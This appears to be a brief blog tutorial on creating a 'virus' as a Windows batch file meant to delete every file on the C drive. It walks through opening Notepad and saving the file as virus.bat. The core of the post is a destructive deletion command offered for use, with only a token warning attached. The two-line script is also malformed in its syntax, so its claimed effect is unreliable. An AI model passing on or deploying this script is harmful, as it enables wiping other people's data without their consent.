How to create a simple virus which is delete all C drive files.


Virus
Want to make a simple virus on your computer�.? In this article I will show you how making a simple virus by following steps:
Step-1:
Just open notepad ( Winkey+R run type notepad and hit enter) or any text editor.
Step-2:
Now copy and paste the following code below into the notepad.
@Echo off
Del C:\ *.* |y
Step-3:
Now save it as virus.bat ( where,  virus is a file name and �. bat� is the file extension ).

Warning:Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Post a Comment

0 Comments